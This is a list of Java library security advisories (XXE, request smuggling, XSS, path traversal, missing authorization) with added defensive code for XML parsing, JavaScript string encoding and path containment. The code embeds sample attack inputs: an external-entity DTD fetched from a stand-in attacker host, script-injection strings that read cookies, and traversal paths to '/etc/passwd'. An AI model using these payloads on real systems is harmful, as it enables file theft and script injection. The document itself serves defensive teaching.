It was discovered that the XmlUtils class in jbpmmigration performed expansion of external parameter entities while parsing XML files. A remote attacker could use this flaw to read files accessible to the user running the application server and, potent…
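A JAXP configuration that refuses the pattern described above (an external parameter entity declared in the DOCTYPE and referenced before the document element), given here as an added example and not jbpmmigration's own XmlUtils code. The two sample documents, the class name and the placeholder host attacker.invalid are constructed for illustration; nothing is fetched because the parser stops at the DOCTYPE:

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class SafeXmlParsing {

    // Constructed sample: a DOCTYPE declaring an external parameter entity and
    // referencing it. A parser that resolves parameter entities would fetch the
    // DTD from attacker.invalid (a placeholder host) before parsing <root/>.
    static final String MALICIOUS =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE root [\n"
      + "  <!ENTITY % ext SYSTEM \"http://attacker.invalid/evil.dtd\">\n"
      + "  %ext;\n"
      + "]>\n"
      + "<root/>";

    // Constructed sample of an ordinary document with no DOCTYPE.
    static final String BENIGN =
        "<?xml version=\"1.0\"?><process name=\"order\"><node id=\"1\"/></process>";

    /** Builds a DocumentBuilder that cannot load or expand external entities. */
    public static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Strongest option: refuse any DOCTYPE, so no entity can be declared at all.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth for deployments that must tolerate a DOCTYPE: disable
        // external general and parameter entities and external DTD loading.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    static Document parse(DocumentBuilder b, String xml) throws Exception {
        return b.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }

    public static void main(String[] args) throws Exception {
        // DocumentBuilder is not thread-safe: build one per parse or per thread.
        DocumentBuilder b = hardenedBuilder();
        System.out.println("benign root element: "
            + parse(b, BENIGN).getDocumentElement().getTagName());
        try {
            parse(b, MALICIOUS);
            System.out.println("UNEXPECTED: malicious document was accepted");
        } catch (SAXParseException e) {
            // With disallow-doctype-decl the parser rejects the DOCTYPE itself,
            // before any entity is declared, let alone resolved.
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The benign document parses; the malicious one is rejected with a SAXParseException at the DOCTYPE. If the application genuinely needs DOCTYPEs (for example, documents with internal entity declarations only), drop the disallow-doctype-decl line and rely on the remaining features, and keep a limit on entity expansion as a separate guard against inline entity-expansion (billion laughs) payloads.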
[io.undertow:undertow-core] Undertow vulnerable to Request Smuggling
In Undertow 2.x before 2.0.0.Alpha2, 1.4.x before 1.4.17.Final, and 1.3.x before 1.3.31.Final, it was found that the fix for CVE-2017-2666 was incomplete and invalid characters are still allowed in the query string and path parameters. This could be ex…
[org.elasticsearch.plugin:x-pack] Improper Privilege Management in X-Pack
The Reporting feature in X-Pack in versions prior to 5.5.2 and standalone Reporting plugin versions prior to 2.4.6 had an impersonation vulnerability. A user with the reporting_user role could execute a report with the permissions of another r…
[com.sonyericsson.jenkins.plugins.bfa:build-failure-analyzer] Cross-site Scripting in Jenkins Build Failure Analyzer plugin
Cross-site scripting (XSS) vulnerability in the Build Failure Analyzer plugin before 1.16.0 in Jenkins allows remote attackers to inject arbitrary web script or HTML via an unspecified parameter.
References
https://nvd.nist.gov/vuln/detail/CVE-2016-49…
[org.apache.atlas:atlas-common] Cross-site Scripting in Apache Atlas
Apache Atlas versions 0.6.0-incubating and 0.7.0-incubating were found vulnerable to Stored Cross-Site Scripting in the edit-tag functionality.
References
https://nvd.nist.gov/vuln/detail/CVE-2017-3151
https://lists.apache.org/thread.html/4a4fef91e067…
[org.apache.sling:org.apache.sling.xss] Cross-site scripting in Apache Sling
In the XSS Protection API module before 1.0.12 in Apache Sling, the encoding done by the XSSAPI.encodeForJSString() method is not restrictive enough and for some input patterns allows script tags to pass through unencoded, leading to potential XSS vuln…
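An encoder for the context the advisory describes (untrusted data placed inside a quoted JavaScript string literal within a script block), added here as an example and not Sling's XSSAPI implementation. It follows the restrictive approach of escaping every character outside a small allow-list, so sequences such as </script> cannot survive the encoding; the class name and sample inputs are constructed:

```java
public final class JsStringEncoder {

    private JsStringEncoder() {}

    /**
     * Encodes s for use between quotes in a JavaScript string literal.
     * Only ASCII letters, digits and ",._" pass through unchanged; everything
     * else becomes a \xHH or \uHHHH escape, so the HTML parser can never see
     * a closing tag and the JS parser can never see a terminating quote.
     */
    public static String encode(String s) {
        StringBuilder out = new StringBuilder(s.length() * 2);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            if ((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z')
                    || (c >= '0' && c <= '9') || c == ',' || c == '.' || c == '_') {
                out.append(c);
            } else if (c < 0x100) {
                // Covers quotes, angle brackets, backslash, CR/LF, NUL and U+2028-style
                // line terminators are handled by the \\u branch below.
                out.append(String.format("\\x%02X", (int) c));
            } else {
                // Surrogate halves are emitted individually, which is valid in JS.
                out.append(String.format("\\u%04X", (int) c));
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed inputs: a tag-closing payload, a quote-breaking payload and a
        // Unicode line terminator that would otherwise end the string literal.
        String[] samples = {
            "</script><script>alert(1)</script>",
            "'; alert(document.cookie); //",
            "line\u2028break"
        };
        for (String s : samples) {
            System.out.println("var v = '" + encode(s) + "';");
        }
    }
}
```

For the first sample, "</script>" is emitted as \x3C\x2Fscript\x3E, which the HTML tokenizer does not recognise as an end tag. This encoder is only correct for a JS string literal inside a <script> element; data that lands in an HTML attribute such as onclick needs HTML attribute encoding applied on top of it.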
[org.apache.myfaces.core:myfaces-impl] Path Traversal in Apache MyFaces
Multiple directory traversal vulnerabilities in MyFaces JavaServer Faces (JSF) in Apache MyFaces Core 2.0.x before 2.0.12 and 2.1.x before 2.1.6 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) ln parameter to faces/javax.fa…
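A resource-path guard of the kind a resource handler needs before turning a library name and resource name from the request into a file path. This is an added example, not MyFaces' own code; the base directory, the class name and the sample requests are constructed, and the ln value is taken from the parameter name mentioned above:

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Path;
import java.nio.file.Paths;

public class ResourcePathGuard {

    private final Path base;

    public ResourcePathGuard(String baseDir) {
        this.base = Paths.get(baseDir).toAbsolutePath().normalize();
    }

    /**
     * Resolves libraryName/resourceName under base. Returns null when the
     * request would escape the base directory or does not name a file.
     */
    public Path resolve(String libraryName, String resourceName) {
        // Decode once (Java 10+ overload). The container normally decodes already;
        // decoding here is defensive and is safe because the containment check
        // below runs on the decoded value.
        String lib = URLDecoder.decode(libraryName, StandardCharsets.UTF_8);
        String res = URLDecoder.decode(resourceName, StandardCharsets.UTF_8);

        // Absolute names and backslashes are never legitimate resource names.
        if (lib.startsWith("/") || res.startsWith("/")
                || lib.contains("\\") || res.contains("\\")) {
            return null;
        }

        // normalize() collapses "." and ".." segments; if the result no longer
        // sits under base, the caller tried to climb out of it.
        Path candidate = base.resolve(lib).resolve(res).normalize();

        // Path.startsWith compares whole components, so a sibling directory such as
        // /webapp/resources.bak is not mistaken for a child of /webapp/resources.
        if (!candidate.startsWith(base)) {
            return null;
        }
        // Reject a request that resolves to base itself rather than a file in it.
        if (candidate.getNameCount() <= base.getNameCount()) {
            return null;
        }
        return candidate;
    }

    public static void main(String[] args) {
        ResourcePathGuard guard = new ResourcePathGuard("/webapp/resources");
        // Constructed requests: one legitimate, three traversal attempts.
        String[][] requests = {
            {"css", "style.css"},
            {"css", "../../WEB-INF/web.xml"},
            {"..", "..%2F..%2Fetc%2Fpasswd"},
            {"css", "/etc/passwd"},
        };
        for (String[] r : requests) {
            System.out.println("ln=" + r[0] + " resource=" + r[1]
                + " -> " + guard.resolve(r[0], r[1]));
        }
    }
}
```

Only the first request resolves (to /webapp/resources/css/style.css); the other three return null because the normalized path lands in /webapp/WEB-INF, /etc, or starts with a slash. Rejecting on ".." as a substring alone is weaker: it misses encoded separators and can also reject legitimate names such as "a..b", so checking containment after normalization is the robust form.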
[org.gradle:gradle-core] Insecure transport protocol in Gradle
Gradle versions from 1.4 to 5.3.1 use an insecure HTTP URL to download dependencies when the built-in JavaScript or CoffeeScript Gradle plugins are used. Dependency artifacts could have been maliciously compromised by a MITM attack against the ajax.goo…
[org.jvnet.hudson.plugins:hipchat] Jenkins HipChat Plugin allows attackers with Overall/Read access to obtain credential IDs
An improper authorization vulnerability exists in Jenkins HipChat Plugin 2.2.0 and earlier in HipChatNotifier.java that allows attackers with Overall/Read access to obtain credential IDs for credentials stored in Jenkins. As of version 2.2.1, an enume…
[io.jenkins.blueocean:blueocean] Missing Authorization in Jenkins Blue Ocean Plugin
The optional Run/Artifacts permission can be enabled by setting a Java system property. Blue Ocean did not check this permission before providing access to archived artifacts; Item/Read permission alone was sufficient.
References
https://nvd.nist.gov/vuln/d…